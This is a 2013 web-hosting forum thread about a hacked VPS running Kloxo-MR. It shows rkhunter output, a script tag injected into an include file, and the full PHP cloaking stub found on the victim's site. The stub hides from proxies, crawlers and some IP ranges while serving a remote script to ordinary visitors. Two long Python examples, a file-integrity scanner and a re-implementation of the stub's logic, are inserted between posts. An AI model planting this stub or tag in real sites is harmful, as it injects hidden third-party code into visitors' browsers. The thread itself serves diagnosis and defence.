Topic: Security Problems


costa1988sv
Security Problems
« on: 2013-02-24, 04:14:06 »
Someone is modifying files and the MySQL database on my VPS. The first time it modified files and stopped, then the MySQL database, and now files again. I changed the password and switched to Kloxo-MR, but that didn't fix it. Can he do that from my PHP script?

[ Rootkit Hunter version 1.4.0 ]

Checking rkhunter version...
  This version  : 1.4.0
  Latest version: 1.4.0
[ Rootkit Hunter version 1.4.0 ]

Checking rkhunter data files...
  Checking file mirrors.dat                                [ No update ]
  Checking file programs_bad.dat                           [ No update ]
  Checking file backdoorports.dat                          [ No update ]
  Checking file suspscan.dat                               [ No update ]
  Checking file i18n/cn                                    [ No update ]
  Checking file i18n/de                                    [ No update ]
  Checking file i18n/en                                    [ No update ]
  Checking file i18n/zh                                    [ No update ]
  Checking file i18n/zh.utf8                               [ No update ]
Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
Warning: The file properties have changed:
         File: /etc/rkhunter.conf
         Current hash: 5a5dfd36c0278364949bdbd851ea9f4e086ac3bf
         Stored hash : abd46c79e524e6f0e3b58756b3332761019edf80
         Current size: 37361    Stored size: 37357
         Current file modification time: 1361644930 (23-Feb-2013 21:42:10)
         Stored file modification time : 1360752129 (13-Feb-2013 13:42:09)
Warning: Found enabled xinetd service: /etc/xinetd.d/pureftp
Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_lxa
Warning: No output found from the lsmod command or the /proc/modules file:
         /proc/modules output:
         lsmod output:
Warning: The kernel modules directory '/lib/modules' is missing or empty.
Warning: The SSH and rkhunter configuration options should be the same:
         SSH configuration option 'PermitRootLogin': yes
         Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no
Warning: Suspicious file types found in /dev:
         /dev/.udev/uevent_seqnum: ASCII text
Warning: Hidden directory found: '/dev/.udev'
Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
Warning: Hidden file found: /usr/bin/.fipscheck.hmac: ASCII text
Warning: Hidden file found: /usr/bin/.ssh.hmac: ASCII text
Warning: Hidden file found: /usr/sbin/.sshd.hmac: ASCII text
Warning: Application 'openssl', version '0.9.8e', is out of date, and possibly a security risk.
Warning: Application 'sshd', version '4.3p2', is out of date, and possibly a security risk.

MRatWork (Administrator)
Re: Security Problems
« Reply #1 on: 2013-02-24, 09:25:52 »
You can attach here the files with the warnings 'Bourne-Again shell script text executable' and 'perl script text executable'.

I want to compare them with my own systems.

Better to update your Kloxo-MR and then report your system here by running 'sh /script/sysfo'.
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

costa1988sv
Re: Security Problems
« Reply #2 on: 2013-02-24, 17:17:01 »
sh /script/sysfo
sh: /script/sysfo: No such file or directory

MRatWork (Administrator)
Re: Security Problems
« Reply #3 on: 2013-02-24, 17:26:46 »
You need to update to the latest Kloxo-MR version if '/script/sysinfo' was not found.

MRatWork (Administrator)
Re: Security Problems
« Reply #4 on: 2013-02-24, 17:41:55 »
It looks like the content of ifdown and the other files is the same as on my servers.

It's a 'false positive'.

Spacedust
Re: Security Problems
« Reply #5 on: 2013-02-24, 20:01:14 »
Yes, got the same. Just look for rootkits.

costa1988sv
Re: Security Problems
« Reply #6 on: 2013-02-24, 20:18:09 »
The rootkit scan was clean.
How do I update?
Current Version:   6.5.0.c.2013021802

MRatWork (Administrator)
Re: Security Problems
« Reply #7 on: 2013-02-24, 20:25:10 »
Quote from: "costa1988sv"
The rootkit scan was clean.
How do I update?
Current Version:   6.5.0.c.2013021802
Read viewtopic.php?f=4&t=644

costa1988sv
Re: Security Problems
« Reply #8 on: 2013-02-25, 05:34:44 »
# /script/sysinfo
A. Kloxo-MR: 6.5.0.c.2013022402
B. OS: CentOS release 5.9 (Final) i686
C. Apps:
   1. MySQL: mysql-5.0.96-1
   2. PHP: php53u-5.3.21-1.ius.el5
   3. Httpd: httpd-2.2.23-3.el5
   4. Lighttpd: --uninstalled--
   5. Nginx: nginx-1.3.13-1.el5
   6. Qmail: qmail-1.03-1.5.15

D. Php-type (for Httpd/proxy): php-fpm_worker

E. Memory:
                total       used       free     shared    buffers     cached
   Mem:          2048        805       1242          0          0          0
   -/+ buffers/cache:        805       1242
   Swap:            0          0          0

I installed the new version and I get random 500 errors and content encoding errors.

costa1988sv
Re: Security Problems
« Reply #9 on: 2013-02-25, 05:54:53 »
Switched to event and no more errors.

costa1988sv
Re: Security Problems
« Reply #10 on: 2013-02-25, 07:02:48 »
In top I have 15+ /usr/libexec/courier-authlib/authdaemond processes.

My script is 200% faster, but WordPress is 25% slower.

MRatWork (Administrator)
Re: Security Problems
« Reply #11 on: 2013-02-25, 07:39:34 »
Quote from: "costa1988sv"
in top i have 15+  /usr/libexec/courier-authlib/authdaemond processes

My script is 200% faster, but WordPress is 25% slower.
It's not 'Security Problems'.

costa1988sv
Re: Security Problems
« Reply #12 on: 2013-02-25, 18:40:00 »
Today he modified a text file that I use with include.
He added at the end:
<script type="text/javascript" src="http://5.175.183.98/js/linkbucks.php"></script>
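The practical question behind both the rkhunter "file properties have changed" warning in the first post and the modified include above is: which web files changed since a known-good state, and do the changes carry this payload? The following is an added example, not code from the thread or from Kloxo-MR. It takes a SHA-256 baseline of a web root, reports changed files, and runs a few indicator regexes over them. The sample files, paths and regexes are constructed for the demonstration; only the host 5.175.183.98 and the shape of the PHP stub come from the thread.

```python
"""Added example (not from the forum thread or Kloxo-MR): file-integrity
baseline plus indicator scan for the injections reported in the thread."""
import hashlib
import json
import os
import re
import tempfile

# Indicator regexes: assumptions about this injection family, not vendor signatures.
INDICATORS = {
    # external <script src="http://<bare IP>/..."> as appended to the include file
    "script_src_ip": re.compile(
        r'<script[^>]+src=["\']https?://\d{1,3}(?:\.\d{1,3}){3}/', re.I),
    # PHP cloaker: silence errors, then branch on the visitor's User-Agent
    "php_cloaker": re.compile(
        r'error_reporting\(0\);.{0,400}?\$_SERVER\[[\'"]HTTP_USER_AGENT', re.S),
    # chain of proxy-revealing headers used to hide from proxied analysts
    "proxy_header_check": re.compile(
        r'HTTP_X_FORWARDED_FOR.{0,600}?HTTP_VIA', re.S),
}
WEB_EXTS = (".php", ".txt", ".html", ".htm", ".js", ".inc")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map relative path -> sha256 for every web file under root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(WEB_EXTS):
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = sha256_file(full)
    return baseline


def diff_baseline(root, baseline):
    """Return (modified, added, removed) relative paths versus the baseline."""
    now = build_baseline(root)
    modified = sorted(p for p in now if p in baseline and now[p] != baseline[p])
    added = sorted(p for p in now if p not in baseline)
    removed = sorted(p for p in baseline if p not in now)
    return modified, added, removed


def match_indicators(text):
    """Names of the indicators that match a file's text, in INDICATORS order."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_file(path):
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        return match_indicators(f.read())


def scan_tree(root, baseline=None):
    """Scan every web file, or only files changed/added since the baseline."""
    if baseline is None:
        targets = sorted(build_baseline(root))
    else:
        modified, added, _ = diff_baseline(root, baseline)
        targets = modified + added
    hits = {}
    for rel in targets:
        found = scan_file(os.path.join(root, rel))
        if found:
            hits[rel] = found
    return hits


def demo():
    """Constructed scenario: clean site, take a baseline, then inject as in the thread."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "inc"))
    with open(os.path.join(root, "inc", "footer.txt"), "w") as f:
        f.write("<p>Contact us</p>\n")
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php\ninclude 'inc/footer.txt';\n")
    with open(os.path.join(root, "about.html"), "w") as f:
        f.write("<h1>About</h1>\n")          # stays untouched, so never rescanned
    baseline = build_baseline(root)
    # attacker appends the script tag from the thread to the included file ...
    with open(os.path.join(root, "inc", "footer.txt"), "a") as f:
        f.write('<script type="text/javascript" '
                'src="http://5.175.183.98/js/linkbucks.php"></script>\n')
    # ... and prepends an abbreviated cloaking stub to the PHP file
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php\nerror_reporting(0);\n"
                "$useragent111 = $_SERVER['HTTP_USER_AGENT'];\n"
                "if ($_SERVER['HTTP_X_FORWARDED_FOR'] || $_SERVER['HTTP_VIA']) { echo ''; }\n"
                "include 'inc/footer.txt';\n")
    return scan_tree(root, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Store the baseline JSON off the server (a compromised host can rewrite it), rebuild it only after a verified clean state, and treat every changed file as suspect even when no indicator matches: the regexes catch this payload, not the next one.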

costa1988sv
Re: Security Problems
« Reply #13 on: 2013-02-25, 18:46:02 »
And in PHP files:
Code:
```php
<?php
// Cloaking stub as found prepended to the PHP files. Only the quoting of the
// echo strings is repaired so the snippet parses; the behaviour is unchanged.
error_reporting(0);                              // suppress any notices it causes
$lang111 = $_SERVER['HTTP_ACCEPT_LANGUAGE'];     // collected but never used
$useragent111 = $_SERVER['HTTP_USER_AGENT'];
$ip111 = $_SERVER['REMOTE_ADDR'];
$ip222 = substr($_SERVER['REMOTE_ADDR'], 0, 2);  // first two characters of the visitor IP
if (strlen($_SERVER['HTTP_REFERER'])) {
    $referer = parse_url($_SERVER['HTTP_REFERER']);
    $referer['host'] = str_replace("www.", "", strtolower($referer['host']));
}
// IP prefixes that never receive the payload. $ip222 is two characters, so the
// three-character and "x"-prefixed entries can never match (dead entries).
$iptarget = array("x103", "x223", "180", "110", "x39", "114", "118", "222", "125",
    "202", "203", "66", "74", "182", "111", "219", "27", "116",
    "119", "61", "124", "141", "195", "64", "80", "82", "217", "89", "5", "31", "37", "46", "62", "77", "78", "79", "80", "81", "82", "83", "84", "85", "86",
    "87", "88", "91", "92", "93", "94", "95", "109", "128", "134", "146", "149", "151",
    "164", "171", "176", "178", "188", "193", "194", "195", "212", "213", "217");
// User-Agents that never receive the payload (crawlers and specific browsers)
$ugtarget = array("Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.19 (KHTML, like Gecko) Ubuntu/12.04 Chromium/18.0.1025.151 Chrome/18.0.1025.151 Safari/535.19",
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Mediapartners-Google",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1");
// Referrer host that never receives the payload (the monetisation site itself)
$rfbad = array("3c21f107.linkbucks.com");
// Any header that reveals a proxy: stay silent
if (   $_SERVER['HTTP_X_FORWARDED_FOR']
    || $_SERVER['HTTP_X_FORWARDED']
    || $_SERVER['HTTP_FORWARDED_FOR']
    || $_SERVER['HTTP_CLIENT_IP']
    || $_SERVER['HTTP_FORWARDED']
    || $_SERVER['HTTP_VIA']
    || $_SERVER['HTTP_CLIENT_IP']
    || $_SERVER['HTTP_FORWARDED_FOR_IP']
    || $_SERVER['VIA']
    || $_SERVER['X_FORWARDED_FOR']
    || $_SERVER['FORWARDED_FOR']
    || $_SERVER['X_FORWARDED']
    || $_SERVER['FORWARDED']
    || $_SERVER['CLIENT_IP']
    || $_SERVER['FORWARDED_FOR_IP']
    || $_SERVER['CLIENT_IP']
    || $_SERVER['HTTP_PROXY_CONNECTION']) {
    echo "";
} elseif (isset($_SERVER['HTTP_REFERER'])) {       // no Referer (curl, typed URL): nothing
    if (in_array($ip222, $iptarget)) {
        echo "";
    } elseif (in_array($useragent111, $ugtarget)) {
        echo "";
    } elseif (!in_array($referer['host'], $rfbad)) {
        // earlier payload URLs left commented out by the author
        //echo '<script type="text/javascript" src="http://www.whackyvidz.com/Webservices/jsParseLinks.aspx?id=3c21f107"></script>';
        //echo '<script src="http://yourjavascript.com/26202461412/my-overlay.js"></script>';
        echo '<script type="text/javascript" src="http://yourjavascript.com/30131107225/h1.js"></script>';
    }
}
```
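The stub above is written so that the people most likely to look for it never see it: it stays silent for any request carrying a proxy header, for any request without a Referer (curl, wget, a URL typed into the address bar), for listed crawler and browser User-Agents, and for listed two-character IP prefixes. The following is an added example, not code from the thread or from Kloxo-MR: its decision logic re-implemented in Python so the conditions can be exercised without a web server. The header and exclusion lists are copied from the posted PHP, including PHP's loose in_array() comparison; the requests in probe_profiles() are constructed for the demonstration.

```python
"""Added example (not from the forum thread or Kloxo-MR): the cloaking
stub's decision logic, mirrored in Python for offline testing."""
from urllib.parse import urlparse

IP_TARGET = ["x103", "x223", "180", "110", "x39", "114", "118", "222", "125",
             "202", "203", "66", "74", "182", "111", "219", "27", "116", "119",
             "61", "124", "141", "195", "64", "80", "82", "217", "89", "5", "31",
             "37", "46", "62", "77", "78", "79", "80", "81", "82", "83", "84",
             "85", "86", "87", "88", "91", "92", "93", "94", "95", "109", "128",
             "134", "146", "149", "151", "164", "171", "176", "178", "188",
             "193", "194", "195", "212", "213", "217"]
UA_TARGET = [
    "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.19 (KHTML, like Gecko) "
    "Ubuntu/12.04 Chromium/18.0.1025.151 Chrome/18.0.1025.151 Safari/535.19",
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Mediapartners-Google",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1",
]
RF_BAD = ["3c21f107.linkbucks.com"]
PROXY_HEADERS = [
    "HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED", "HTTP_FORWARDED_FOR",
    "HTTP_CLIENT_IP", "HTTP_FORWARDED", "HTTP_VIA", "HTTP_FORWARDED_FOR_IP",
    "VIA", "X_FORWARDED_FOR", "FORWARDED_FOR", "X_FORWARDED", "FORWARDED",
    "CLIENT_IP", "FORWARDED_FOR_IP", "HTTP_PROXY_CONNECTION",
]
PAYLOAD = ('<script type="text/javascript" '
           'src="http://yourjavascript.com/30131107225/h1.js"></script>')


def php_loose_in(needle, haystack):
    """PHP in_array() default (loose) comparison for strings: two numeric
    strings compare as numbers, so the prefix '5.' of a 5.x.x.x address
    equals the list entry '5'."""
    def num(s):
        try:
            return float(s)
        except ValueError:
            return None
    n = num(needle)
    for item in haystack:
        i = num(item)
        if (n is not None and i is not None and n == i) or needle == item:
            return True
    return False


def payload_for(server):
    """Mirror of the PHP stub; `server` is a dict standing in for $_SERVER.
    Returns what the stub would echo: PAYLOAD, or '' when it stays hidden."""
    # PHP truthiness: a missing or empty proxy header counts as false
    if any(server.get(h) for h in PROXY_HEADERS):
        return ""                       # proxied / analyst traffic: hidden
    if "HTTP_REFERER" not in server:
        return ""                       # curl, wget, typed URL: never shown
    if php_loose_in(server.get("REMOTE_ADDR", "")[:2], IP_TARGET):
        return ""                       # excluded IP prefixes: hidden
    if server.get("HTTP_USER_AGENT", "") in UA_TARGET:
        return ""                       # crawlers / listed browsers: hidden
    host = (urlparse(server["HTTP_REFERER"]).hostname or "").lower()
    if host.replace("www.", "") in RF_BAD:
        return ""                       # already came from the ad site
    return PAYLOAD


def probe_profiles():
    """Constructed requests an investigator might send; True = payload served."""
    browser = "Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0"
    base = {"REMOTE_ADDR": "98.10.20.30", "HTTP_USER_AGENT": browser,
            "HTTP_REFERER": "https://www.google.com/search?q=example"}
    profiles = {
        "curl_direct": {"REMOTE_ADDR": "98.10.20.30",
                        "HTTP_USER_AGENT": "curl/7.29.0"},   # no Referer
        "behind_proxy": dict(base, HTTP_X_FORWARDED_FOR="10.0.0.7"),
        "googlebot": dict(base, HTTP_USER_AGENT=UA_TARGET[1]),
        "excluded_prefix_66": dict(base, REMOTE_ADDR="66.249.66.1"),
        "prefix_5x": dict(base, REMOTE_ADDR="5.175.183.98"),  # '5.' == '5' in PHP
        "from_ad_site": dict(base, HTTP_REFERER="http://3c21f107.linkbucks.com/x"),
        "ordinary_visitor": base,
    }
    return {name: payload_for(s) == PAYLOAD for name, s in profiles.items()}


if __name__ == "__main__":
    for name, served in probe_profiles().items():
        print(f"{name:20s} payload served: {served}")
```

Only the ordinary visitor profile gets the script: a browser User-Agent, an external Referer, an address outside the excluded prefixes, and no proxy in the path. To check a live site for this stub, fetch the same page once with plain curl and once with those headers set, and diff the two bodies; a check made from the owner's own desk through a proxy, or with no Referer, is exactly what the author designed to come back clean.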

MRatWork (Administrator)
Re: Security Problems
« Reply #14 on: 2013-02-25, 18:46:39 »
Questions:

1. Did you install Kloxo-MR fresh, or update from Kloxo Official?
2. Was the attack on all domains or just a certain domain?
3. What app (WordPress etc.) is on the domain that was attacked?